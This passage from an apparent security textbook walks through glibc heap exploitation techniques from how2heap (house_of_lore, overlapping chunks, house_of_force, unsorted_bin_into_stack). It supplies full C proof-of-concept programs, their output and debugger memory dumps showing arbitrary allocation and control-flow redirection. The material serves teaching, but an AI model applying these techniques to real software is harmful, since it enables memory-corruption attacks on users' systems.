gef➤  heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x603050, bk=0x603050
 →   Chunk(addr=0x603060, size=0x40, flags=PREV_INUSE)

Finally, the next malloc returns the address of fake chunk 1, which lies on the stack and is under our control. The small bin now looks like this:

HEAD(undefined) <-> fake chunk 2 <-> TAIL
gef➤  x/10gx &stack_buffer_2
0x7fffffffdc30:    0x0000000000000000    0x0000000000000000  <-- fake chunk 2
0x7fffffffdc40:    0x00007ffff7dd1bf8    0x0000000000400aed      <-- fd->TAIL
0x7fffffffdc50:    0x0000000000000000    0x0000000000000000  <-- chunk 4
0x7fffffffdc60:    0x4141414141414141    0x4141414141414141
0x7fffffffdc70:    0x00007fffffffdd60    0x7c008088c400bc00

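We have thus tricked malloc into allocating a chunk on the stack.

One last thought: the victim could also start out as a fast chunk. After being freed it goes into the fast bins rather than the unsorted bin, but a later malloc that triggers consolidation also moves it into the small bins. Try it yourself.

ASan reports a heap-use-after-free, so the vulnerability used above to modify the bk pointer is most naturally a UAF, although an overflow would work as well: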

$ gcc -fsanitize=address -g house_of_lore.c
$ ./a.out
Allocated the victim (small) chunk: 0x60c00000bf80
stack_buffer_1: 0x7ffd1fbc5cd0
stack_buffer_2: 0x7ffd1fbc5c90

Freeing the victim chunk 0x60c00000bf80, it will be inserted in the unsorted bin
=================================================================
==6034==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c00000bf80 at pc 0x000000400eec bp 0x7ffd1fbc5bf0 sp 0x7ffd1fbc5be0
READ of size 8 at 0x60c00000bf80 thread T0
    #0 0x400eeb in main /home/firmy/how2heap/house_of_lore.c:27
    #1 0x7febee33c82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #2 0x400b38 in _start (/home/firmy/how2heap/a.out+0x400b38)

Finally, a version for libc-2.27:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

void jackpot(){ puts("Nice jump d00d"); exit(0); }

int main() {
    intptr_t *victim = malloc(0x80);

    // fill the tcache
    int *a[10];
    int i;
    for (i = 0; i < 7; i++) {
        a[i] = malloc(0x80);
    }
    for (i = 0; i < 7; i++) {
        free(a[i]);
    }

    memset(victim, 'A', 0x80);
    void *p5 = malloc(0x10);
    memset(p5, 'A', 0x10);
    intptr_t *victim_chunk = victim - 2;
    fprintf(stderr, "Allocated the victim (small) chunk: %p\n", victim);

    intptr_t* stack_buffer_1[4] = {0};
    intptr_t* stack_buffer_2[6] = {0};
    stack_buffer_1[0] = 0;
    stack_buffer_1[2] = victim_chunk;
    stack_buffer_1[3] = (intptr_t*)stack_buffer_2;
    stack_buffer_2[2] = (intptr_t*)stack_buffer_1;
    stack_buffer_2[3] = (intptr_t*)stack_buffer_1;    // 3675 bck->fd = bin;

    fprintf(stderr, "stack_buffer_1: %p\n", (void*)stack_buffer_1);
    fprintf(stderr, "stack_buffer_2: %p\n\n", (void*)stack_buffer_2);

    free((void*)victim);
    fprintf(stderr, "Freeing the victim chunk %p, it will be inserted in the unsorted bin\n", victim);
    fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]);
    fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);

    void *p2 = malloc(0x100);
    fprintf(stderr, "Malloc a chunk that can't be handled by the unsorted bin, nor the SmallBin: %p\n", p2);
    fprintf(stderr, "The victim chunk %p will be inserted in front of the SmallBin\n", victim);
    fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]);
    fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);

    victim[1] = (intptr_t)stack_buffer_1;
    fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n");

    void *p3 = malloc(0x40);

    // empty the tcache
    for (i = 0; i < 7; i++) {
        a[i] = malloc(0x80);
    }

    char *p4 = malloc(0x80);
    memset(p4, 'A', 0x10);
    fprintf(stderr, "This last malloc should return a chunk at the position injected in bin->bk: %p\n", p4);
    fprintf(stderr, "The fd pointer of stack_buffer_2 has changed: %p\n\n", stack_buffer_2[2]);

    intptr_t sc = (intptr_t)jackpot;
    memcpy((p4+0xa8), &sc, 8);
}
$ gcc -g house_of_lore.c
$ ./a.out
Allocated the victim (small) chunk: 0x55674d75f260
stack_buffer_1: 0x7ffff71fb1d0
stack_buffer_2: 0x7ffff71fb1f0

Freeing the victim chunk 0x55674d75f260, it will be inserted in the unsorted bin
victim->fd: 0x7f1eba392b00
victim->bk: 0x7f1eba392b00

Malloc a chunk that can't be handled by the unsorted bin, nor the SmallBin: 0x55674d75f700
The victim chunk 0x55674d75f260 will be inserted in front of the SmallBin
victim->fd: 0x7f1eba392b80
victim->bk: 0x7f1eba392b80

Now emulating a vulnerability that can overwrite the victim->bk pointer
This last malloc should return a chunk at the position injected in bin->bk: 0x7ffff71fb1e0
The fd pointer of stack_buffer_2 has changed: 0x7ffff71fb1e0

Nice jump d00d

overlapping_chunks

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

int main() {
    intptr_t *p1,*p2,*p3,*p4;

    p1 = malloc(0x90 - 8);
    p2 = malloc(0x90 - 8);
    p3 = malloc(0x80 - 8);
    memset(p1, 'A', 0x90 - 8);
    memset(p2, 'A', 0x90 - 8);
    memset(p3, 'A', 0x80 - 8);
    fprintf(stderr, "Now we allocate 3 chunks on the heap\n");
    fprintf(stderr, "p1=%p\np2=%p\np3=%p\n\n", p1, p2, p3);

    free(p2);
    fprintf(stderr, "Freeing the chunk p2\n");

    int evil_chunk_size = 0x111;
    int evil_region_size = 0x110 - 8;
    *(p2-1) = evil_chunk_size; // Overwriting the "size" field of chunk p2
    fprintf(stderr, "Emulating an overflow that can overwrite the size of the chunk p2.\n\n");

    p4 = malloc(evil_region_size);
    fprintf(stderr, "p4: %p ~ %p\n", p4, p4+evil_region_size);
    fprintf(stderr, "p3: %p ~ %p\n", p3, p3+0x80);

    fprintf(stderr, "\nIf we memset(p4, 'B', 0xd0), we have:\n");
    memset(p4, 'B', 0xd0);
    fprintf(stderr, "p4 = %s\n", (char *)p4);
    fprintf(stderr, "p3 = %s\n", (char *)p3);

    fprintf(stderr, "\nIf we memset(p3, 'C', 0x50), we have:\n");
    memset(p3, 'C', 0x50);
    fprintf(stderr, "p4 = %s\n", (char *)p4);
    fprintf(stderr, "p3 = %s\n", (char *)p3);
}
$ gcc -g overlapping_chunks.c
$ ./a.out
Now we allocate 3 chunks on the heap
p1=0x1e2b010
p2=0x1e2b0a0
p3=0x1e2b130

Freeing the chunk p2
Emulating an overflow that can overwrite the size of the chunk p2.

p4: 0x1e2b0a0 ~ 0x1e2b8e0
p3: 0x1e2b130 ~ 0x1e2b530

If we memset(p4, 'B', 0xd0), we have:
p4 = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
p3 = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa

If we memset(p3, 'C', 0x50), we have:
p4 = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
p3 = CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa

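This one is fairly simple: it is about overlapping heap chunks. An overflow is used to rewrite the size of a free chunk in the unsorted bin, which changes the size of the chunk the next malloc can return.

First allocate three chunks, then free the middle one: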

gef➤  x/60gx 0x602010-0x10
0x602000:    0x0000000000000000    0x0000000000000091  <-- chunk 1
0x602010:    0x4141414141414141    0x4141414141414141
0x602020:    0x4141414141414141    0x4141414141414141
0x602030:    0x4141414141414141    0x4141414141414141
0x602040:    0x4141414141414141    0x4141414141414141
0x602050:    0x4141414141414141    0x4141414141414141
0x602060:    0x4141414141414141    0x4141414141414141
0x602070:    0x4141414141414141    0x4141414141414141
0x602080:    0x4141414141414141    0x4141414141414141
0x602090:    0x4141414141414141    0x0000000000000091  <-- chunk 2 [be freed]
0x6020a0:    0x00007ffff7dd1b78    0x00007ffff7dd1b78
0x6020b0:    0x4141414141414141    0x4141414141414141
0x6020c0:    0x4141414141414141    0x4141414141414141
0x6020d0:    0x4141414141414141    0x4141414141414141
0x6020e0:    0x4141414141414141    0x4141414141414141
0x6020f0:    0x4141414141414141    0x4141414141414141
0x602100:    0x4141414141414141    0x4141414141414141
0x602110:    0x4141414141414141    0x4141414141414141
0x602120:    0x0000000000000090    0x0000000000000080  <-- chunk 3
0x602130:    0x4141414141414141    0x4141414141414141
0x602140:    0x4141414141414141    0x4141414141414141
0x602150:    0x4141414141414141    0x4141414141414141
0x602160:    0x4141414141414141    0x4141414141414141
0x602170:    0x4141414141414141    0x4141414141414141
0x602180:    0x4141414141414141    0x4141414141414141
0x602190:    0x4141414141414141    0x4141414141414141
0x6021a0:    0x4141414141414141    0x0000000000020e61  <-- top chunk
0x6021b0:    0x0000000000000000    0x0000000000000000
0x6021c0:    0x0000000000000000    0x0000000000000000
0x6021d0:    0x0000000000000000    0x0000000000000000
gef➤  heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x602090, bk=0x602090
 →   Chunk(addr=0x6020a0, size=0x90, flags=PREV_INUSE)

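chunk 2 is placed in the unsorted bin, with a size of 0x90.

Next, assume an overflow lets us rewrite the size of chunk 2. Here we change it to 0x111, the sum of the original sizes of chunk 2 and chunk 3 (0x90 + 0x80) plus one. The lowest bit set to 1 indicates that chunk 1 is in use; it makes no difference here whether it is set.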

gef➤  heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x602090, bk=0x602090
 →   Chunk(addr=0x6020a0, size=0x110, flags=PREV_INUSE)

The entry in the unsorted bin now reflects the new size.

Next malloc a chunk 4 whose size equals the sum of chunk 2 and chunk 3, so that it covers both:

gef➤  x/60gx 0x602010-0x10
0x602000:    0x0000000000000000    0x0000000000000091  <-- chunk 1
0x602010:    0x4141414141414141    0x4141414141414141
0x602020:    0x4141414141414141    0x4141414141414141
0x602030:    0x4141414141414141    0x4141414141414141
0x602040:    0x4141414141414141    0x4141414141414141
0x602050:    0x4141414141414141    0x4141414141414141
0x602060:    0x4141414141414141    0x4141414141414141
0x602070:    0x4141414141414141    0x4141414141414141
0x602080:    0x4141414141414141    0x4141414141414141
0x602090:    0x4141414141414141    0x0000000000000111  <-- chunk 4
0x6020a0:    0x00007ffff7dd1b78    0x00007ffff7dd1b78
0x6020b0:    0x4141414141414141    0x4141414141414141
0x6020c0:    0x4141414141414141    0x4141414141414141
0x6020d0:    0x4141414141414141    0x4141414141414141
0x6020e0:    0x4141414141414141    0x4141414141414141
0x6020f0:    0x4141414141414141    0x4141414141414141
0x602100:    0x4141414141414141    0x4141414141414141
0x602110:    0x4141414141414141    0x4141414141414141
0x602120:    0x0000000000000090    0x0000000000000080  <-- chunk 3
0x602130:    0x4141414141414141    0x4141414141414141
0x602140:    0x4141414141414141    0x4141414141414141
0x602150:    0x4141414141414141    0x4141414141414141
0x602160:    0x4141414141414141    0x4141414141414141
0x602170:    0x4141414141414141    0x4141414141414141
0x602180:    0x4141414141414141    0x4141414141414141
0x602190:    0x4141414141414141    0x4141414141414141
0x6021a0:    0x4141414141414141    0x0000000000020e61  <-- top chunk
0x6021b0:    0x0000000000000000    0x0000000000000000
0x6021c0:    0x0000000000000000    0x0000000000000000
0x6021d0:    0x0000000000000000    0x0000000000000000

In effect chunk 4 and chunk 3 now overlap, and each can modify the other's data, exactly as the program output above shows.

overlapping_chunks_2

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>

int main() {
    intptr_t *p1,*p2,*p3,*p4,*p5,*p6;
    unsigned int real_size_p1,real_size_p2,real_size_p3,real_size_p4,real_size_p5,real_size_p6;
    int prev_in_use = 0x1;

    p1 = malloc(0x10);
    p2 = malloc(0x80);
    p3 = malloc(0x80);
    p4 = malloc(0x80);
    p5 = malloc(0x10);
    real_size_p1 = malloc_usable_size(p1);
    real_size_p2 = malloc_usable_size(p2);
    real_size_p3 = malloc_usable_size(p3);
    real_size_p4 = malloc_usable_size(p4);
    real_size_p5 = malloc_usable_size(p5);
    memset(p1, 'A', real_size_p1);
    memset(p2, 'A', real_size_p2);
    memset(p3, 'A', real_size_p3);
    memset(p4, 'A', real_size_p4);
    memset(p5, 'A', real_size_p5);
    fprintf(stderr, "Now we allocate 5 chunks on the heap\n\n");
    fprintf(stderr, "chunk p1: %p ~ %p\n", p1, (unsigned char *)p1+malloc_usable_size(p1));
    fprintf(stderr, "chunk p2: %p ~ %p\n", p2, (unsigned char *)p2+malloc_usable_size(p2));
    fprintf(stderr, "chunk p3: %p ~ %p\n", p3, (unsigned char *)p3+malloc_usable_size(p3));
    fprintf(stderr, "chunk p4: %p ~ %p\n", p4, (unsigned char *)p4+malloc_usable_size(p4));
    fprintf(stderr, "chunk p5: %p ~ %p\n", p5, (unsigned char *)p5+malloc_usable_size(p5));

    free(p4);
    fprintf(stderr, "\nLet's free the chunk p4\n\n");

    fprintf(stderr, "Emulating an overflow that can overwrite the size of chunk p2 with (size of chunk_p2 + size of chunk_p3)\n\n");
    *(unsigned int *)((unsigned char *)p1 + real_size_p1) = real_size_p2 + real_size_p3 + prev_in_use + sizeof(size_t) * 2; // BUG HERE

    free(p2);

    p6 = malloc(0x1b0 - 0x10);
    real_size_p6 = malloc_usable_size(p6);
    fprintf(stderr, "Allocating a new chunk 6: %p ~ %p\n\n", p6, (unsigned char *)p6+real_size_p6);

    fprintf(stderr, "Now p6 and p3 are overlapping, if we memset(p6, 'B', 0xd0)\n");
    fprintf(stderr, "p3 before = %s\n", (char *)p3);
    memset(p6, 'B', 0xd0);
    fprintf(stderr, "p3 after  = %s\n", (char *)p3);
}
$ gcc -g overlapping_chunks_2.c
$ ./a.out
Now we allocate 5 chunks on the heap

chunk p1: 0x18c2010 ~ 0x18c2028
chunk p2: 0x18c2030 ~ 0x18c20b8
chunk p3: 0x18c20c0 ~ 0x18c2148
chunk p4: 0x18c2150 ~ 0x18c21d8
chunk p5: 0x18c21e0 ~ 0x18c21f8

Let's free the chunk p4

Emulating an overflow that can overwrite the size of chunk p2 with (size of chunk_p2 + size of chunk_p3)

Allocating a new chunk 6: 0x18c2030 ~ 0x18c21d8

Now p6 and p3 are overlapping, if we memset(p6, 'B', 0xd0)
p3 before = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
p3 after  = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�

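This is again a chunk overlap. In the previous case the size was modified after the chunk had been freed and placed in the unsorted bin, and a differently sized chunk was then malloc'ed. Here the size is modified before the free, so that free writes a wrong prev_size into a later chunk and the in-use chunk in the middle is forcibly merged. Also, the earlier overlap was between adjacent chunks, whereas this one spans non-adjacent chunks.

We need five chunks. Assume chunk 1 has an overflow that can rewrite the header of chunk 2; chunk 5 keeps chunk 4 from being merged into the top chunk when it is freed. The region we want to overlap therefore runs from chunk 2 to chunk 4. First free chunk 4 and note the prev_size value of chunk 5: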

gef➤  x/70gx 0x602010-0x10
0x602000:    0x0000000000000000    0x0000000000000021  <-- chunk 1
0x602010:    0x4141414141414141    0x4141414141414141
0x602020:    0x4141414141414141    0x0000000000000091  <-- chunk 2
0x602030:    0x4141414141414141    0x4141414141414141
0x602040:    0x4141414141414141    0x4141414141414141
0x602050:    0x4141414141414141    0x4141414141414141
0x602060:    0x4141414141414141    0x4141414141414141
0x602070:    0x4141414141414141    0x4141414141414141
0x602080:    0x4141414141414141    0x4141414141414141
0x602090:    0x4141414141414141    0x4141414141414141
0x6020a0:    0x4141414141414141    0x4141414141414141
0x6020b0:    0x4141414141414141    0x0000000000000091  <-- chunk 3
0x6020c0:    0x4141414141414141    0x4141414141414141
0x6020d0:    0x4141414141414141    0x4141414141414141
0x6020e0:    0x4141414141414141    0x4141414141414141
0x6020f0:    0x4141414141414141    0x4141414141414141
0x602100:    0x4141414141414141    0x4141414141414141
0x602110:    0x4141414141414141    0x4141414141414141
0x602120:    0x4141414141414141    0x4141414141414141
0x602130:    0x4141414141414141    0x4141414141414141
0x602140:    0x4141414141414141    0x0000000000000091  <-- chunk 4 [be freed]
0x602150:    0x00007ffff7dd1b78    0x00007ffff7dd1b78      <-- fd, bk pointer
0x602160:    0x4141414141414141    0x4141414141414141
0x602170:    0x4141414141414141    0x4141414141414141
0x602180:    0x4141414141414141    0x4141414141414141
0x602190:    0x4141414141414141    0x4141414141414141
0x6021a0:    0x4141414141414141    0x4141414141414141
0x6021b0:    0x4141414141414141    0x4141414141414141
0x6021c0:    0x4141414141414141    0x4141414141414141
0x6021d0:    0x0000000000000090    0x0000000000000020  <-- chunk 5 <-- prev_size
0x6021e0:    0x4141414141414141    0x4141414141414141
0x6021f0:    0x4141414141414141    0x0000000000020e11  <-- top chunk
0x602200:    0x0000000000000000    0x0000000000000000
0x602210:    0x0000000000000000    0x0000000000000000
0x602220:    0x0000000000000000    0x0000000000000000
gef➤  heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x602140, bk=0x602140
 →   Chunk(addr=0x602150, size=0x90, flags=PREV_INUSE)

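The freed chunk 4 is placed in the unsorted bin with a size of 0x90.

Next comes the crucial step. Using the overflow in chunk 1, change the size of chunk 2 to the sum of chunk 2 and chunk 3, that is 0x90+0x90+0x1=0x121, where the trailing 1 is the flag bit. When chunk 2 is then freed, free trusts the modified size and treats the whole region of chunk 2 plus chunk 3 as the chunk being released. It finds that the chunk immediately after that region, chunk 4, is also free, merges the two into one large free chunk, writes the merged size into the prev_size of chunk 5, and places the result in the unsorted bin.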

gef➤  x/70gx 0x602010-0x10
0x602000:    0x0000000000000000    0x0000000000000021  <-- chunk 1
0x602010:    0x4141414141414141    0x4141414141414141
0x602020:    0x4141414141414141    0x00000000000001b1  <-- chunk 2 [be freed] <-- unsorted bin
0x602030:    0x00007ffff7dd1b78    0x00007ffff7dd1b78      <-- fd, bk pointer
0x602040:    0x4141414141414141    0x4141414141414141
0x602050:    0x4141414141414141    0x4141414141414141
0x602060:    0x4141414141414141    0x4141414141414141
0x602070:    0x4141414141414141    0x4141414141414141
0x602080:    0x4141414141414141    0x4141414141414141
0x602090:    0x4141414141414141    0x4141414141414141
0x6020a0:    0x4141414141414141    0x4141414141414141
0x6020b0:    0x4141414141414141    0x0000000000000091  <-- chunk 3
0x6020c0:    0x4141414141414141    0x4141414141414141
0x6020d0:    0x4141414141414141    0x4141414141414141
0x6020e0:    0x4141414141414141    0x4141414141414141
0x6020f0:    0x4141414141414141    0x4141414141414141
0x602100:    0x4141414141414141    0x4141414141414141
0x602110:    0x4141414141414141    0x4141414141414141
0x602120:    0x4141414141414141    0x4141414141414141
0x602130:    0x4141414141414141    0x4141414141414141
0x602140:    0x4141414141414141    0x0000000000000091  <-- chunk 4 [be freed]
0x602150:    0x00007ffff7dd1b78    0x00007ffff7dd1b78
0x602160:    0x4141414141414141    0x4141414141414141
0x602170:    0x4141414141414141    0x4141414141414141
0x602180:    0x4141414141414141    0x4141414141414141
0x602190:    0x4141414141414141    0x4141414141414141
0x6021a0:    0x4141414141414141    0x4141414141414141
0x6021b0:    0x4141414141414141    0x4141414141414141
0x6021c0:    0x4141414141414141    0x4141414141414141
0x6021d0:    0x00000000000001b0    0x0000000000000020  <-- chunk 5 <-- prev_size
0x6021e0:    0x4141414141414141    0x4141414141414141
0x6021f0:    0x4141414141414141    0x0000000000020e11  <-- top chunk
0x602200:    0x0000000000000000    0x0000000000000000
0x602210:    0x0000000000000000    0x0000000000000000
0x602220:    0x0000000000000000    0x0000000000000000
gef➤  heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x602020, bk=0x602020
 →   Chunk(addr=0x602030, size=0x1b0, flags=PREV_INUSE)

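The chunk in the unsorted bin now has size 0x1b0, that is 0x90*3. So chunk 3, although still in use, has been swallowed into the free chunk.

Finally, if we allocate a large block of size 0x1b0-0x10, the returned chunk covers chunk 2 + chunk 3 + chunk 4. chunk 6 and chunk 3 now overlap, with the result shown in the program output above.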

3.1.8 Linux Heap Exploitation (Part 2)

how2heap
References

Download files

how2heap

house_of_force

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>

char bss_var[] = "This is a string that we want to overwrite.";

int main() {
    fprintf(stderr, "We will overwrite a variable at %p\n\n", bss_var);

    intptr_t *p1 = malloc(0x10);
    int real_size = malloc_usable_size(p1);
    memset(p1, 'A', real_size);
    fprintf(stderr, "Let's allocate the first chunk of 0x10 bytes: %p.\n", p1);
    fprintf(stderr, "Real size of our allocated chunk is 0x%x.\n\n", real_size);

    intptr_t *ptr_top = (intptr_t *) ((char *)p1 + real_size);
    fprintf(stderr, "Overwriting the top chunk size with a big value so the malloc will never call mmap.\n");
    fprintf(stderr, "Old size of top chunk: %#llx\n", *((unsigned long long int *)ptr_top));
    ptr_top[0] = -1;
    fprintf(stderr, "New size of top chunk: %#llx\n", *((unsigned long long int *)ptr_top));

    unsigned long evil_size = (unsigned long)bss_var - sizeof(long)*2 - (unsigned long)ptr_top;
    fprintf(stderr, "\nThe value we want to write to at %p, and the top chunk is at %p, so accounting for the header size, we will malloc %#lx bytes.\n", bss_var, ptr_top, evil_size);
    void *new_ptr = malloc(evil_size);
    int real_size_new = malloc_usable_size(new_ptr);
    memset((char *)new_ptr + real_size_new - 0x20, 'A', 0x20);
    fprintf(stderr, "As expected, the new pointer is at the same place as the old top chunk: %p\n", new_ptr);

    void* ctr_chunk = malloc(0x30);
    fprintf(stderr, "malloc(0x30) => %p!\n", ctr_chunk);
    fprintf(stderr, "\nNow, the next chunk we overwrite will point at our target buffer, so we can overwrite the value.\n");

    fprintf(stderr, "old string: %s\n", bss_var);
    strcpy(ctr_chunk, "YEAH!!!");
    fprintf(stderr, "new string: %s\n", bss_var);
}
$ gcc -g house_of_force.c
$ ./a.out
We will overwrite a variable at 0x601080

Let's allocate the first chunk of 0x10 bytes: 0x824010.
Real size of our allocated chunk is 0x18.

Overwriting the top chunk size with a big value so the malloc will never call mmap.
Old size of top chunk: 0x20fe1
New size of top chunk: 0xffffffffffffffff

The value we want to write to at 0x601080, and the top chunk is at 0x824028, so accounting for the header size, we will malloc 0xffffffffffddd048 bytes.
As expected, the new pointer is at the same place as the old top chunk: 0x824030
malloc(0x30) => 0x601080!

Now, the next chunk we overwrite will point at our target buffer, so we can overwrite the value.
old string: This is a string that we want to overwrite.
new string: YEAH!!!

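house_of_force is a technique that tricks malloc into returning an arbitrary address by overwriting the size field of the top chunk. The highest region of free heap memory is always a single free chunk, the top chunk. When neither the bins nor the fast bins can satisfy a request, malloc carves the memory out of the top chunk, so the size of the top chunk keeps changing as memory is allocated and released. The attack assumes an overflow that reaches the top chunk header and overwrites its size with a very large value, which ensures that every later malloc is served from the top chunk instead of calling mmap. If the attacker then requests a huge size (a negative number when read as a signed integer), adding it to the top chunk address wraps around, and the top chunk can be moved to an address below the heap (for example the program's .bss or .data section, or the GOT). The next malloc then hands the attacker the memory at the relocated address.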

First allocate an arbitrary chunk. Memory now holds two chunks, chunk 1 and the top chunk:

gef➤  x/8gx 0x602010-0x10
0x602000:    0x0000000000000000    0x0000000000000021  <-- chunk 1
0x602010:    0x4141414141414141    0x4141414141414141
0x602020:    0x4141414141414141    0x0000000000020fe1  <-- top chunk
0x602030:    0x0000000000000000    0x0000000000000000

chunk 1 has 0x18 bytes of usable memory.

Assume chunk 1 can be overflowed. Using that bug, we change the size of the top chunk to a very large value:

gef➤  x/8gx 0x602010-0x10
0x602000:    0x0000000000000000    0x0000000000000021  <-- chunk 1
0x602010:    0x4141414141414141    0x4141414141414141
0x602020:    0x4141414141414141    0xffffffffffffffff  <-- modified top chunk
0x602030:    0x0000000000000000    0x0000000000000000

After the overwrite, size == 0xffffffffffffffff.

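Now we can malloc a region of any size without triggering mmap. Next, malloc a chunk that ends exactly where the region we want to control begins, so that the following malloc returns that region. The request size is the target address minus the top chunk address, minus the size of the chunk header.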

gef➤  x/8gx 0x602010-0x10
0x602000:    0x0000000000000000    0x0000000000000021
0x602010:    0x4141414141414141    0x4141414141414141
0x602020:    0x4141414141414141    0xfffffffffffff051
0x602030:    0x0000000000000000    0x0000000000000000
gef➤  x/12gx 0x602010+0xfffffffffffff050
0x601060:    0x4141414141414141    0x4141414141414141
0x601070:    0x4141414141414141    0x0000000000000fa9  <-- top chunk
0x601080 <bss_var>:    0x2073692073696854    0x676e697274732061  <-- target
0x601090 <bss_var+16>:    0x6577207461687420    0x6f7420746e617720
0x6010a0 <bss_var+32>:    0x6972777265766f20    0x00000000002e6574
0x6010b0:    0x0000000000000000    0x0000000000000000
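The size calculation can be checked with plain 64-bit arithmetic. The following is a minimal sketch, assuming an x86-64 layout (16-byte chunk header, 16-byte alignment); the function names are hypothetical helpers, not part of glibc. The first function mirrors the evil_size expression in the demo program, the second models where the next malloc lands after the top chunk has been moved.

```c
#include <stdint.h>

/* Assumed x86-64 values: two 8-byte header words, 16-byte alignment. */
#define HDR_SIZE    UINT64_C(16)
#define ALIGN_MASK  UINT64_C(15)

/*
 * Request size that moves the top chunk next to `target`.
 * `top_size_field` is the address of the top chunk's size field
 * (ptr_top in the demo). Unsigned arithmetic wraps modulo 2^64,
 * which is what makes a target below the heap reachable.
 */
uint64_t hof_request_size(uint64_t target, uint64_t top_size_field)
{
    return target - HDR_SIZE - top_size_field;
}

/*
 * Address returned by the malloc that follows the huge request.
 * `top_chunk` is the start of the old top chunk (size field - 8).
 */
uint64_t hof_next_result(uint64_t top_chunk, uint64_t request)
{
    /* Padded chunk size, as malloc rounds the request up. */
    uint64_t nb = (request + 8 + ALIGN_MASK) & ~ALIGN_MASK;
    uint64_t new_top = top_chunk + nb;   /* wraps around 2^64 */
    return new_top + HDR_SIZE;           /* user pointer of the next chunk */
}
```

With the addresses from the program output above (target 0x601080, size field of the top chunk at 0x824028), hof_request_size yields 0xffffffffffddd048, and hof_next_result(0x824020, 0xffffffffffddd048) yields 0x601080.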

malloc once more so that the new chunk covers the target address. We now control the target memory:

gef➤  x/12gx 0x602010+0xfffffffffffff050
0x601060:    0x4141414141414141    0x4141414141414141
0x601070:    0x4141414141414141    0x0000000000000041  <-- chunk 2
0x601080 <bss_var>:    0x2073692073696854    0x676e697274732061  <-- target
0x601090 <bss_var+16>:    0x6577207461687420    0x6f7420746e617720
0x6010a0 <bss_var+32>:    0x6972777265766f20    0x00000000002e6574
0x6010b0:    0x0000000000000000    0x0000000000000f69  <-- top chunk

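The drawback of this technique is that it is affected by ASLR. To modify memory at a chosen location, the attacker first needs to know the current address of the top chunk in order to compute the malloc size that relocates it. Because ASLR randomizes heap addresses, the technique has to be combined with an information leak.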

unsorted_bin_into_stack

#include <stdio.h>
#include <stdlib.h>

int main() {
    unsigned long stack_buf[4] = {0};

    unsigned long *victim  = malloc(0x80);
    unsigned long *p1 = malloc(0x10);
    fprintf(stderr, "Allocating the victim chunk at %p\n", victim);

    // deal with tcache
    // int *k[10], i;
    // for (i = 0; i < 7; i++) {
    //     k[i] = malloc(0x80);
    // }
    // for (i = 0; i < 7; i++) {
    //     free(k[i]);
    // }

    free(victim);
    fprintf(stderr, "Freeing the chunk, it will be inserted in the unsorted bin\n\n");

    stack_buf[1] = 0x100 + 0x10;
    stack_buf[3] = (unsigned long)stack_buf;        // or any other writable address
    fprintf(stderr, "Create a fake chunk on the stack\n");
    fprintf(stderr, "fake->size: %p\n", (void *)stack_buf[1]);
    fprintf(stderr, "fake->bk: %p\n\n", (void *)stack_buf[3]);

    victim[1] = (unsigned long)stack_buf;
    fprintf(stderr, "Now we overwrite the victim->bk pointer to stack: %p\n\n", stack_buf);

    fprintf(stderr, "Malloc a chunk which size is 0x110 will return the region of our fake chunk: %p\n", &stack_buf[2]);

    unsigned long *fake = malloc(0x100);
    fprintf(stderr, "malloc(0x100): %p\n", fake);
}
$ gcc -g unsorted_bin_into_stack.c
$ ./a.out
Allocating the victim chunk at 0x17a1010
Freeing the chunk, it will be inserted in the unsorted bin

Create a fake chunk on the stack
fake->size: 0x110
fake->bk: 0x7fffcd906480

Now we overwrite the victim->bk pointer to stack: 0x7fffcd906480

